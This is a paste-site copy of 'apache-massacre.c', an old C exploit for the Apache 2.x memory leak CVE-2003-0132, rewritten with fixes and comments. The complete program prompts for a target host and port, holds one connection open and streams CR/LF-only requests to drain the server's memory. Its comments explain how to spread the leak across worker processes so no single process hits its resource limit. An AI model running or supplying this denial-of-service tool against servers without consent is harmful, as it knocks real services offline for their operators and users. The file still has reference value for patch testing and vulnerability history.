FlyFar

Apache 2.x - Memory Leak - CVE-2003-0132

Jan 24th, 2024
  1. /* apache-massacre.c
  2. * Test code for the Apache 2.x memory leak, CVE-2003-0132: it holds one TCP
     * connection open and streams requests that consist only of CR/LF pairs.
  3. * By Matthew Murphy
  4. *
  5. * DISCLAIMER: This exploit tool is provided only to test networks for a
  6. * known vulnerability. Do not use this tool on systems you do not control,
  7. * and do not use this tool on networks you do not own without appropriate
  8. * consent from the network owner. You are responsible for any damage your
  9. * use of the tool causes. In no event may the author of this tool be held
  10. * responsible for damages relating to its use.
  11. *
  12. * As with most Apache exposures, the impacts vary between ports of the server:
  13. *
  14. * Non-Unix (Win32, Netware, OS/2): These ports are most adversely affected
  15. * by this, as Apache's child process doesn't terminate normally unless the
  16. * parent process stops. This means that leaks (and any performance loss) hang
  17. * around until Apache is restarted.
  18. *
  19. * Unix/mpm_prefork: This MPM offers the most protection against successful
  20. * exploitation, as the leak is confined to the single child process that
      * served the connection and is reclaimed when that child exits.
  21. *
  22. * Unix/other MPMs: These other MPMs utilize multiple Apache processes for
  23. * multiple Apache requests. Depending on the MPM in use and the traffic rates
  24. * of the server, this may be used to the advantage of a potential attacker.
  25. * If several Apache processes serve requests, an attacker can spread the
  26. * substantial leak across them so that no single process trips the per-process
  27. * (ulimit-style) resource limits imposed on httpd's UID (usually nobody, www, or apache)
  28. *
  29. * Credit: iDEFENSE reported this issue to several security lists on April 8,
  30. * 2003 following the Apache release announcement. Apache fixed the flaw about
  31. * a month after the initial disclosure of this vulnerability. iDEFENSE credits
  32. * the discovery of this vulnerability to an anonymous researcher.
  33. *
  34. * Happy Hunting!
  35. */
  36.  
  #include <limits.h>
  #include <signal.h>
  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>

  #ifndef _WIN32
  #include <sys/types.h>
  #include <fcntl.h>
  #include <netdb.h>
  #include <netinet/in.h>
  #include <sys/socket.h>
  #include <sys/stat.h>
  #include <sys/time.h>
  #include <sys/wait.h>
  #include <unistd.h>
  #else
  #include <windows.h>
  #pragma comment(lib, "wsock32.lib")
  #endif
  52.  
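  /* Stop flag: set asynchronously by sig_handler() when the user hits Ctrl-C
   * and polled by main() between sends. `volatile sig_atomic_t` is the one
   * type ISO C guarantees can be stored from a signal handler and read back by
   * the interrupted code; a plain `int` was not, and `volatile` also keeps the
   * compiler from hoisting the read out of the polling loop (on Win32 the
   * handler runs on a separate thread, so that matters there too). */
  volatile sig_atomic_t sig_fired = 0;

  /* Ctrl-C / console-control handler: records the stop request and returns.
   * The body is a single store, so it is safe to run in signal context.
   *
   * Unix:  installed on SIGINT with signal()/sigset(); `sig` is the signal
   *        number and is unused.
   * Win32: installed with SetConsoleCtrlHandler(); per the Win32 API, returning
   *        TRUE marks the event as handled so the default handler does not end
   *        the process before main() can clean up.
   */
  #ifndef _WIN32
  void sig_handler(int sig) {
      (void)sig;
      sig_fired = 1;
  }
  #else
  BOOL WINAPI sig_handler(DWORD dwCtrlType) {
      (void)dwCtrlType;
      sig_fired = 1;
      return TRUE;
  }
  #endif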
  67.  
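  /* Print `prompt`, read one line from stdin into buf[cap] and strip the
   * trailing CR/LF. Returns 0 on success, -1 on EOF or read error.
   *
   * Stripping the terminator is not cosmetic: fgets() keeps the newline, and the
   * original handed "host\n" straight to gethostbyname(), which cannot resolve it.
   */
  static int read_line(const char *prompt, char *buf, size_t cap) {
      size_t len;

      fputs(prompt, stdout);
      fflush(stdout);
      if (fgets(buf, (int)cap, stdin) == NULL) {
          return -1;
      }
      len = strlen(buf);
      while (len > 0 && (buf[len - 1] == '\n' || buf[len - 1] == '\r')) {
          buf[--len] = '\0';
      }
      return 0;
  }

  /* Parse a decimal integer in [lo, hi] from s into *out. Returns 0 on success,
   * -1 if s is empty, has trailing junk or is out of range. strtol() is used
   * instead of atoi() so that junk and overflow are rejected instead of being
   * silently read as 0 (or LONG_MAX). */
  static int parse_long_in(const char *s, long lo, long hi, long *out) {
      char *end = NULL;
      long v;

      if (s[0] == '\0') {
          return -1;
      }
      v = strtol(s, &end, 10);
      if (end == s || *end != '\0' || v < lo || v > hi) {
          return -1;
      }
      *out = v;
      return 0;
  }

  /* Entry point. Interactively asks for host, port and the number of CR/LF
   * pairs per request, connects once, and then streams that CR/LF-only payload
   * at the server until Ctrl-C (sig_fired) or until the peer stops accepting
   * data. Returns 0 on a clean stop, 1 on any error.
   *
   * Defects fixed relative to the original:
   *  - `!buffer[0] == 0x0D` and `!send(...) == newlines` parse as
   *    `(!x) == 13` / `(!x) == 200`, which are always false: the newline count
   *    could never be changed and a failed send() was never detected.
   *  - the address was read through `*(unsigned long *)he->h_addr`, an
   *    over-read of the 4-byte address on LP64 hosts; it is now memcpy'd after
   *    checking the address family and length.
   *  - fgets()/malloc() results were unchecked, input was parsed with atoi(),
   *    and error paths leaked the buffer/socket (and Winsock state).
   */
  int main(int argc, char *argv[]) {
  #ifdef _WIN32
      SOCKET s = INVALID_SOCKET;
      WSADATA wsa_prov;
  #else
      int s = -1;
  #endif
      struct sockaddr_in sin;
      char buffer[1025];
      struct hostent *he;
      unsigned short iPort = 80;   /* used when the port prompt is left blank */
      long newlines = 100;         /* CR/LF pairs per request; default if blank */
      long value;
      size_t payload_len;
      char *p = NULL;
      char *p2;
      long i;
      int rc = 1;

      (void)argc;
      (void)argv;

      printf("Apache Massacre v1.0\r\n");
      printf("Exploit by Matthew Murphy\r\n");
      printf("Vulnerability reported by iDEFENSE Labs\r\n\r\n");

  #ifdef _WIN32
      if (WSAStartup(0x0101, &wsa_prov)) {
          perror("WSAStartup");
          return 1;
      }
  #endif

      /* --- target host --- */
      if (read_line("Please enter the web server's host/IP: ", buffer, sizeof buffer)) {
          fprintf(stderr, "unexpected end of input\r\n");
          goto out;
      }
      he = gethostbyname(buffer);
      if (!he) {
          perror("gethostbyname");
          goto out;
      }
      /* Only an IPv4 answer fits a sockaddr_in; refuse anything else rather
       * than copying bytes of the wrong size. */
      if (he->h_addrtype != AF_INET || he->h_length != (int)sizeof sin.sin_addr
              || he->h_addr_list[0] == NULL) {
          fprintf(stderr, "gethostbyname: no IPv4 address for %s\r\n", buffer);
          goto out;
      }
      memset(&sin, 0, sizeof sin);
      sin.sin_family = AF_INET;
      memcpy(&sin.sin_addr, he->h_addr_list[0], sizeof sin.sin_addr);

      /* --- target port --- */
      if (read_line("Please enter the web server's port: ", buffer, sizeof buffer)) {
          fprintf(stderr, "unexpected end of input\r\n");
          goto out;
      }
      if (buffer[0] != '\0') {
          if (parse_long_in(buffer, 1, 65535, &value)) {
              fprintf(stderr, "invalid port: %s\r\n", buffer);
              goto out;
          }
          iPort = (unsigned short)value;
      }
      sin.sin_port = htons(iPort);

      /* --- stop on Ctrl-C --- */
  #ifndef _WIN32
  #ifdef _SOLARIS
      sigset(SIGINT, &sig_handler);
  #else
      signal(SIGINT, &sig_handler);
  #endif
      /* A peer that drops the connection would otherwise kill this process with
       * SIGPIPE before the send() error below can be reported. */
      signal(SIGPIPE, SIG_IGN);
      /* NOTE(review): on libcs whose signal() installs SA_RESTART semantics, a
       * send() blocked on a full socket buffer resumes after the handler runs and
       * the stop is only noticed once that send completes; sigaction() without
       * SA_RESTART would avoid that, at the cost of portability. */
  #else
      SetConsoleCtrlHandler(&sig_handler, TRUE);
  #endif

      /* --- request size --- */
      if (read_line("How many newlines should be in each request [100]: ", buffer, sizeof buffer)) {
          fprintf(stderr, "unexpected end of input\r\n");
          goto out;
      }
      if (buffer[0] != '\0') {
          /* The upper bound keeps 2*newlines within an int, which is what the
           * Win32 send() length parameter and the original arithmetic used. */
          if (parse_long_in(buffer, 1, INT_MAX / 2, &value)) {
              fprintf(stderr, "invalid newline count: %s\r\n", buffer);
              goto out;
          }
          newlines = value;
      }

      /* Build the payload: `newlines` CR/LF pairs, nothing else. */
      payload_len = (size_t)newlines * 2;
      p = malloc(payload_len);
      if (!p) {
          perror("malloc");
          goto out;
      }
      for (p2 = p, i = 0; i < newlines; i++) {
          *p2++ = '\r';
          *p2++ = '\n';
      }

      /* --- connect and flood --- */
      s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  #ifdef _WIN32
      if (s == INVALID_SOCKET) {
  #else
      if (s < 0) {
  #endif
          perror("socket");
          goto out;
      }
      if (connect(s, (const struct sockaddr *)&sin, sizeof sin)) {
          perror("connect");
          goto out;
      }

      /* Each iteration pushes one CR/LF-only request down the same connection.
       * The loop ends when the SIGINT handler raises sig_fired or when the peer
       * stops taking data; a short or failed send is an error. */
      while (!sig_fired) {
  #ifdef _WIN32
          long sent = (long)send(s, p, (int)payload_len, 0);
  #else
          long sent = (long)send(s, p, payload_len, 0);
  #endif
          if (sent < 0 || (size_t)sent != payload_len) {
              if (sig_fired) {
                  break;  /* SIGINT interrupted the send: a normal stop, not an error */
              }
              perror("send");
              goto out;
          }
      }
      printf("Terminating on SIGINT");
      rc = 0;

  out:
      /* Single exit path so the buffer, socket and Winsock state are released
       * on every route out of main(). */
      free(p);
  #ifdef _WIN32
      if (s != INVALID_SOCKET) {
          closesocket(s);
      }
      WSACleanup();
  #else
      if (s >= 0) {
          close(s);
      }
  #endif
      return rc;
  }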
  153.  
  154.  
  155. // milw0rm.com [2003-04-09]
  156.      